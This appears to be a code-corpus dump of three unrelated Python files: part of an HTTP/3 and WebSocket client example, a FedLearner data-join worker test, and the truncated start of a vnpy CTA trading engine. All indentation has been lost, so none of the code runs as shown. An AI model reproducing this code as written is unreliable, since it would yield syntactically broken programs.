async def send(self, message: str):
"""
Send a message.
"""
assert isinstance(message, str)
data = self.websocket.send(wsproto.events.TextMessage(data=message))
self.http.send_data(stream_id=self.stream_id, data=data, end_stream=False)
self.transmit()
def http_event_received(self, event: H3Event):
if isinstance(event, HeadersReceived):
for header, value in event.headers:
if header == b"sec-websocket-protocol":
self.subprotocol = value.decode()
elif isinstance(event, DataReceived):
self.websocket.receive_data(event.data)
for ws_event in self.websocket.events():
self.websocket_event_received(ws_event)
def websocket_event_received(self, event: wsproto.events.Event) -> None:
if isinstance(event, wsproto.events.TextMessage):
self.queue.put_nowait(event.data)
class HttpClient(QuicConnectionProtocol):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.pushes: Dict[int, Deque[H3Event]] = {}
self._http: Optional[HttpConnection] = None
self._request_events: Dict[int, Deque[H3Event]] = {}
self._request_waiter: Dict[int, asyncio.Future[Deque[H3Event]]] = {}
self._websockets: Dict[int, WebSocket] = {}
if self._quic.configuration.alpn_protocols[0].startswith("hq-"):
self._http = H0Connection(self._quic)
else:
self._http = H3Connection(self._quic)
async def get(self, url: str, headers: Dict = {}) -> Deque[H3Event]:
"""
Perform a GET request.
"""
return await self._request(
HttpRequest(method="GET", url=URL(url), headers=headers)
)
async def post(self, url: str, data: bytes, headers: Dict = {}) -> Deque[H3Event]:
"""
Perform a POST request.
"""
return await self._request(
HttpRequest(method="POST", url=URL(url), content=data, headers=headers)
)
async def websocket(self, url: str, subprotocols: List[str] = []) -> WebSocket:
"""
Open a WebSocket.
"""
request = HttpRequest(method="CONNECT", url=URL(url))
stream_id = self._quic.get_next_available_stream_id()
websocket = WebSocket(
http=self._http, stream_id=stream_id, transmit=self.transmit
)
self._websockets[stream_id] = websocket
headers = [
(b":method", b"CONNECT"),
(b":scheme", b"https"),
(b":authority", request.url.authority.encode()),
(b":path", request.url.full_path.encode()),
(b":protocol", b"websocket"),
(b"user-agent", USER_AGENT.encode()),
(b"sec-websocket-version", b"13"),
]
if subprotocols:
headers.append(
(b"sec-websocket-protocol", ", ".join(subprotocols).encode())
)
self._http.send_headers(stream_id=stream_id, headers=headers)
self.transmit()
return websocket
def http_event_received(self, event: H3Event):
if isinstance(event, (HeadersReceived, DataReceived)):
stream_id = event.stream_id
if stream_id in self._request_events:
# http
self._request_events[event.stream_id].append(event)
if event.stream_ended:
request_waiter = self._request_waiter.pop(stream_id)
request_waiter.set_result(self._request_events.pop(stream_id))
elif stream_id in self._websockets:
# websocket
websocket = self._websockets[stream_id]
websocket.http_event_received(event)
elif event.push_id in self.pushes:
# push
self.pushes[event.push_id].append(event)
elif isinstance(event, PushPromiseReceived):
self.pushes[event.push_id] = deque()
self.pushes[event.push_id].append(event)
def quic_event_received(self, event: QuicEvent):
# pass event to the HTTP layer
if self._http is not None:
for http_event in self._http.handle_event(event):
self.http_event_received(http_event)
async def _request(self, request: HttpRequest):
stream_id = self._quic.get_next_available_stream_id()
self._http.send_headers(
stream_id=stream_id,
headers=[
(b":method", request.method.encode()),
(b":scheme", request.url.scheme.encode()),
(b":authority", request.url.authority.encode()),
(b":path", request.url.full_path.encode()),
(b"user-agent", USER_AGENT.encode()),
]
+ [(k.encode(), v.encode()) for (k, v) in request.headers.items()],
)
self._http.send_data(stream_id=stream_id, data=request.content, end_stream=True)
waiter = self._loop.create_future()
self._request_events[stream_id] = deque()
self._request_waiter[stream_id] = waiter
self.transmit()
return await asyncio.shield(waiter)
async def perform_http_request(
client: HttpClient, url: str, data: str, print_response: bool
) -> None:
# perform request
start = time.time()
if data is not None:
http_events = await client.post(
url,
data=data.encode(),
headers={"content-type": "application/x-www-form-urlencoded"},
)
else:
http_events = await client.get(url)
elapsed = time.time() - start
# print speed
octets = 0
for http_event in http_events:
if isinstance(http_event, DataReceived):
octets += len(http_event.data)
logger.info(
"Received %d bytes in %.1f s (%.3f Mbps)"
% (octets, elapsed, octets * 8 / elapsed / 1000000)
)
# print response
if print_response:
for http_event in http_events:
if isinstance(http_event, HeadersReceived):
headers = b""
for k, v in http_event.headers:
headers += k + b": " + v + b"\r\n"
if headers:
sys.stderr.buffer.write(headers + b"\r\n")
sys.stderr.buffer.flush()
elif isinstance(http_event, DataReceived):
sys.stdout.buffer.write(http_event.data)
sys.stdout.buffer.flush()
def save_session_ticket(ticket):
"""
Callback which is invoked by the TLS engine when a new session ticket
is received.
"""
logger.info("New session ticket received")
print(ticket)
if args.session_ticket:
with open(args.session_ticket, "wb") as fp:
pickle.dump(ticket, fp)
def threaded_GUI():
sg.theme('DarkAmber') # Add a touch of color
# All the stuff inside your window.
layout = [[sg.Text('Some text on Row 1')],
[sg.Text('Enter something on Row 2'), sg.InputText()],
[sg.Button('Ok'), sg.Button('Cancel')]]
# Create the Window
window = sg.Window('Window Title', layout)
# Event Loop to process "events" and get the "values" of the inputs
while True:
event, values = window.read()
if event in (None, 'Cancel'): # if user closes window or clicks cancel
break
print('GUI ', values[0])
#asyncio.run(send_message(ws, values[0]))
window.close()
async def send_message(ws, message):
await ws.send(message)
async def run(
configuration: QuicConfiguration,
url: str,
data: str,
parallel: int,
print_response: bool,
) -> None:
# parse URL
parsed = urlparse(url)
assert parsed.scheme in (
"https",
"wss",
), "Only https:// or wss:// URLs are supported."
if ":" in parsed.netloc:
host, port_str = parsed.netloc.split(":")
port = int(port_str)
else:
host = parsed.netloc
port = 443
async with connect(
host,
port,
configuration=configuration,
create_protocol=HttpClient,
session_ticket_handler=save_session_ticket,
) as client:
client = cast(HttpClient, client)
if parsed.scheme == "wss":
ws = await client.websocket(url, subprotocols=["chat", "superchat"])
#threaded_GUI()
#print(ws.stream_id)
#os.system('clear')
# send some messages and receive reply
#while input("Type your message: ") != "exit":
def start_loop(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
new_loop = asyncio.new_event_loop()
t = Thread(target=start_loop, args=(new_loop,))
t.start()
new_loop2 = asyncio.new_event_loop()
t2 = Thread(target=start_loop, args=(new_loop2,))
t2.start()
def more_work(x):
print("More work %s" % x)
time.sleep(x)
print("Finished more work %s" % x)
async def read_server():
#ws = await client.websocket(url, subprotocols=["chat", "superchat"])
while True:
messageRec = await ws.recv()
print(messageRec)
async def read_user():
#ws = await client.websocket(url, subprotocols=["chat", "superchat"])
while True:
#("listening to user")
message = stdin.readline()
await ws.send(message)
#print("I sent: "+message)
#new_loop.call_soon_threadsafe(read_server())
#new_loop2.call_soon_threadsafe(read_user())
#asyncio.run_coroutine_threadsafe(read_server(), new_loop)
asyncio.run_coroutine_threadsafe(read_user(), new_loop2)
while True:
messageRec = await ws.recv()
print(messageRec)
#futures = [...]
#loop = asyncio.get_event_loop()
#loop.run_until_complete(asyncio.wait(futures))
#loop.run_forever(read_server(ws))
#loop.run_until_complete(read_server(ws))
#tasks = [asyncio.ensure_future(read_server(ws)),
# asyncio.ensure_future(read_user(ws))]
#loop.run_until_complete(asyncio.gather(*tasks))
#while True:
#'.run(read_server(ws))
#message = stdin.readline()
#if message == "":
# continue
#else:
# await ws.send(message)
#messageRec = await ws.recv()
#if messageRec != "":
# print("< " + messageRec)
#message = input("Type your message: ")
#await ws.send(message)
#messageRec = await ws.recv()
#task = [print("< " + messageRec)]
#await asyncio.wait(task)
#print("< " + messageRec)
#await ws.close()
else:
# perform request
coros = [
perform_http_request(
client=client, url=url, data=data, print_response=print_response
)
for i in range(parallel)
]
await asyncio.gather(*coros)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="HTTP/3 client")
parser.add_argument("url", type=str, help="the URL to query (must be HTTPS)")
parser.add_argument(
"--ca-certs", type=str, help="load CA certificates from the specified file"
)
parser.add_argument(
"-d", "--data", type=str, help="send the specified data in a POST request"
)
parser.add_argument(
"-k",
"--insecure",
action="store_true",
help="do not validate server certificate",
)
parser.add_argument("--legacy-http", action="store_true", help="use HTTP/0.9")
parser.add_argument(
"-q", "--quic-log", type=str, help="log QUIC events to a file in QLOG format"
)
parser.add_argument(
"-l",
"--secrets-log",
type=str,
help="log secrets to a file, for use with Wireshark",
)
parser.add_argument(
"--parallel", type=int, default=1, help="perform this many requests in parallel"
)
parser.add_argument(
"--print-response", action="store_true", help="print response headers and body"
)
parser.add_argument(
"-s",
"--session-ticket",
type=str,
help="read and write session ticket from the specified file",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="increase logging verbosity"
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)s %(levelname)s %(name)s %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO,
)
# prepare configuration
configuration = QuicConfiguration(
is_client=True, alpn_protocols=H0_ALPN if args.legacy_http else H3_ALPN
)
if args.ca_certs:
configuration.load_verify_locations(args.ca_certs)
if args.insecure:
configuration.verify_mode = ssl.CERT_NONE
if args.quic_log:
configuration.quic_logger = QuicLogger()
if args.secrets_log:
configuration.secrets_log_file = open(args.secrets_log, "a")
if args.session_ticket:
try:
with open(args.session_ticket, "rb") as fp:
configuration.session_ticket = pickle.load(fp)
except FileNotFoundError:
pass
if uvloop is not None:
uvloop.install()
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(
run(
configuration=configuration,
url=args.url,
data=args.data,
parallel=args.parallel,
print_response=args.print_response,
)
)
finally:
if configuration.quic_logger is not None:
with open(args.quic_log, "w") as logger_fp:
json.dump(configuration.quic_logger.to_dict(), logger_fp, indent=4)
|
test_data_join_worker.py | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.etcd_client import EtcdClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
def setUp(self):
etcd_name = 'test_etcd'
etcd_addrs = 'localhost:2379'
etcd_base_dir_l = 'byefl_l'
etcd_base_dir_f= 'byefl_f'
data_source_name = 'test_data_source'
etcd_l = EtcdClient(etcd_name, etcd_addrs, etcd_base_dir_l, True)
etcd_f = EtcdClient(etcd_name, etcd_addrs, etcd_base_dir_f, True)
etcd_l.delete_prefix(common.data_source_etcd_base_dir(data_source_name))
etcd_f.delete_prefix(common.data_source_etcd_base_dir(data_source_name))
data_source_l = common_pb.DataSource()
self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
data_source_l.role = common_pb.FLRole.Leader
data_source_l.state = common_pb.DataSourceState.Init
data_source_l.output_base_dir = "./ds_output_l"
self.raw_data_dir_l = "./raw_data_l"
data_source_f = common_pb.DataSource()
self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
data_source_f.role = common_pb.FLRole.Follower
data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
data_source_f.state = common_pb.DataSourceState.Init
data_source_f.output_base_dir = "./ds_output_f"
self.raw_data_dir_f = "./raw_data_f"
data_source_meta = common_pb.DataSourceMeta()
data_source_meta.name = data_source_name
data_source_meta.partition_num = 2
data_source_meta.start_time = 0
data_source_meta.end_time = 100000000
data_source_l.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(etcd_l, data_source_l)
data_source_f.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(etcd_f, data_source_f)
self.etcd_l = etcd_l
self.etcd_f = etcd_f
self.data_source_l = data_source_l
self.data_source_f = data_source_f
self.data_source_name = data_source_name
self.etcd_name = etcd_name
self.etcd_addrs = etcd_addrs
self.etcd_base_dir_l = etcd_base_dir_l
self.etcd_base_dir_f = etcd_base_dir_f
self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
self.etcd_l, self.raw_data_pub_dir_l
)
self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
self.etcd_f, self.raw_data_pub_dir_f
)
if gfile.Exists(data_source_l.output_base_dir):
gfile.DeleteRecursively(data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(data_source_f.output_base_dir):
gfile.DeleteRecursively(data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.worker_options = dj_pb.DataJoinWorkerOptions(
use_mock_etcd=True,
raw_data_options=dj_pb.RawDataOptions(
raw_data_iter='TF_RECORD',
read_ahead_size=1<<20,
read_batch_size=128
),
example_id_dump_options=dj_pb.ExampleIdDumpOptions(
example_id_dump_interval=1,
example_id_dump_threshold=1024
),
example_joiner_options=dj_pb.ExampleJoinerOptions(
example_joiner='STREAM_JOINER',
min_matching_window=64,
max_matching_window=256,
data_block_dump_interval=30,
data_block_dump_threshold=1000
),
batch_processor_options=dj_pb.BatchProcessorOptions(
batch_size=512,
max_flying_item=2048
),
data_block_builder_options=dj_pb.WriterOptions(
output_writer='TF_RECORD'
)
)
self.total_index = 1 << 12
def generate_raw_data(self, start_index, etcd, rdp, data_source, raw_data_base_dir, partition_id,
block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
raw_data_dir = os.path.join(raw_data_base_dir,
common.partition_repr(partition_id))
if not gfile.Exists(raw_data_dir):
gfile.MakeDirs(raw_data_dir)
useless_index = 0
new_raw_data_fnames = []
for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
builder = DataBlockBuilder(
raw_data_base_dir,
data_source.data_source_meta.name,
partition_id, block_index,
dj_pb.WriterOptions(output_writer='TF_RECORD'), None
)
cands = list(range(block_index * block_size, (block_index + 1) * block_size))
start_index = cands[0]
for i in range(len(cands)):
if random.randint(1, 4) > 2:
continue
a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
if a < 0:
a = 0
if a >= len(cands):
a = len(cands) - 1
if b < 0:
b = 0
if b >= len(cands):
b = len(cands) - 1
if (abs(cands[a]-i-start_index) <= shuffle_win_size and
abs(cands[b]-i-start_index) <= shuffle_win_size):
cands[a], cands[b] = cands[b], cands[a]
for example_idx in cands:
feat = {}
example_id = '{}'.format(example_idx).encode()
feat['example_id'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[example_id]))
event_time = 150000000 + example_idx
feat['event_time'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[event_time]))
feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[feat_val_fmt.format(example_idx).encode()]))
example = tf.train.Example(features=tf.train.Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
useless_index, useless_index)
useless_index += 1
meta = builder.finish_data_block()
fname = common.encode_data_block_fname(
data_source.data_source_meta.name,
meta
)
new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
fpaths = [os.path.join(raw_data_dir, f)
for f in gfile.ListDirectory(raw_data_dir)
if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
for fpath in fpaths:
if fpath.endswith(common.DataBlockMetaSuffix):
gfile.Remove(fpath)
rdp.publish_raw_data(partition_id, new_raw_data_fnames)
def test_all_assembly(self):
for i in range(3):
logging.info('Testing round %d', i + 1)
self._inner_test_round(i*self.total_index)
def _inner_test_round(self, start_index):
for i in range(self.data_source_l.data_source_meta.partition_num):
self.generate_raw_data(
start_index, self.etcd_l, self.raw_data_publisher_l,
self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
'leader_key_partition_{}'.format(i) + ':{}',
'leader_value_partition_{}'.format(i) + ':{}'
)
self.generate_raw_data(
start_index, self.etcd_f, self.raw_data_publisher_f,
self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
'follower_key_partition_{}'.format(i) + ':{}',
'follower_value_partition_{}'.format(i) + ':{}'
)
master_addr_l = 'localhost:4061'
master_addr_f = 'localhost:4062'
master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
batch_mode=True)
master_l = data_join_master.DataJoinMasterService(
int(master_addr_l.split(':')[1]), master_addr_f,
self.data_source_name, self.etcd_name, self.etcd_base_dir_l,
self.etcd_addrs, master_options,
)
master_l.start()
master_f = data_join_master.DataJoinMasterService(
int(master_addr_f.split(':')[1]), master_addr_l,
self.data_source_name, self.etcd_name, self.etcd_base_dir_f,
self.etcd_addrs, master_options
)
master_f.start()
channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Processing and \
dss_f.state == common_pb.DataSourceState.Processing:
break
except Exception as e:
pass
time.sleep(2)
worker_addr_l = 'localhost:4161'
worker_addr_f = 'localhost:4162'
worker_l = data_join_worker.DataJoinWorkerService(
int(worker_addr_l.split(':')[1]),
worker_addr_f, master_addr_l, 0,
self.etcd_name, self.etcd_base_dir_l,
self.etcd_addrs, self.worker_options
)
worker_f = data_join_worker.DataJoinWorkerService(
int(worker_addr_f.split(':')[1]),
worker_addr_l, master_addr_f, 0,
self.etcd_name, self.etcd_base_dir_f,
self.etcd_addrs, self.worker_options
)
th_l = threading.Thread(target=worker_l.run, name='worker_l')
th_f = threading.Thread(target=worker_f.run, name='worker_f')
th_l.start()
th_f.start()
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Ready and \
dss_f.state == common_pb.DataSourceState.Ready:
break
except Exception as e:
pass
time.sleep(2)
th_l.join()
th_f.join()
master_l.stop()
master_f.stop()
def tearDown(self):
if gfile.Exists(self.data_source_l.output_base_dir):
gfile.DeleteRecursively(self.data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(self.data_source_f.output_base_dir):
gfile.DeleteRecursively(self.data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.etcd_f.delete_prefix(common.data_source_etcd_base_dir(self.etcd_base_dir_f))
self.etcd_l.delete_prefix(common.data_source_etcd_base_dir(self.etcd_base_dir_l))
if __name__ == '__main__':
unittest.main()
|
engine.py | """"""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "cta_strategy_setting.json"
data_filename = "cta_strategy_data.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
self.classes = {} # class_name: stategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
self.stop_order_count = 0 # for generating stop_orderid
self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.rq_client = None
self.rq_symbols = set()
self.vt_tradeids = set() # for filtering duplicate trade
self.offset_converter = OffsetConverter(self.main_engine)
def init_engine(self):
"""
"""
self.init_rqdata()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
self.stop_all_strategies()
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
def init_rqdata(self):
"""
Init RQData client.
"""
result = rqdata_client.init()
if result:
self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
"""
Query bar data from RQData.
"""
req = HistoryRequest(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end
)
data = rqdata_client.query_history(req)
return data
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP[order.status],
vt_orderids=[order.vt_orderid],
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
def process_trade_event(self, event: Event):
""""""
trade = event.data
# Filter duplicate trade push
if trade.vt_tradeid in self.vt_tradeids:
return
self.vt_tradeids.add(trade.vt_tradeid)
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
# Update strategy pos before calling on_trade method
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def check_stop_order(self, tick: TickData):
""""""
for stop_order in list(self.stop_orders.values()):
if stop_order.vt_symbol != tick.vt_symbol:
continue
long_triggered = (
stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
)
short_triggered = (
stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
)
if long_triggered or short_triggered:
strategy = self.strategies[stop_order.strategy_name]
# To get excuted immediately after stop order is
# triggered, use limit price if available, otherwise
# use ask_price_5 or bid_price_5
if stop_order.direction == Direction.LONG:
if tick.limit_up:
price = tick.limit_up
else:
price = tick.ask_price_5
else:
if tick.limit_down:
price = tick.limit_down
else:
price = tick.bid_price_5
contract = self.main_engine.get_contract(stop_order.vt_symbol)
vt_orderids = self.send_limit_order(
strategy,
contract,
stop_order.direction,
stop_order.offset,
price,
stop_order.volume,
stop_order.lock
)
# Update stop order status if placed successfully
if vt_orderids:
# Remove from relation map.
self.stop_orders.pop(stop_order.stop_orderid)
strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_order.stop_orderid in strategy_vt_orderids:
strategy_vt_orderids.remove(stop_order.stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.TRIGGERED
stop_order.vt_orderids = vt_orderids
self.call_strategy_func(
strategy, strategy.on_stop_order, stop_order
)
self.put_stop_order_event(stop_order)
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
lock: bool
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
)
# Convert with offset converter
req_list = self.offset_converter.convert_order_request(original_req, lock)
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
vt_orderids.append(vt_orderid)
self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
def send_local_stop_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Create a new local stop order.
"""
self.stop_order_count += 1
stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"
stop_order = StopOrder(
vt_symbol=strategy.vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop_orderid=stop_orderid,
strategy_name=strategy.strategy_name,
lock=lock
)
self.stop_orders[stop_orderid] = stop_order
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
vt_orderids.add(stop_orderid)
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
return stop_orderid
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
"""
Cancel a local stop order.
"""
stop_order = self.stop_orders.get(stop_orderid, None)
if not stop_order:
return
strategy = self.strategies[stop_order.strategy_name]
# Remove from relation map.
self.stop_orders.pop(stop_orderid)
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if stop_orderid in vt_orderids:
vt_orderids.remove(stop_orderid)
# Change stop order status to cancelled and update to strategy.
stop_order.status = StopOrderStatus.CANCELLED
self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
self.put_stop_order_event(stop_order)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool,
lock: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
# Round order price and volume to nearest incremental value
price = round_to(price, contract.pricetick)
volume = round_to(volume, contract.min_volume)
if stop:
if contract.stop_supported:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
else:
return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
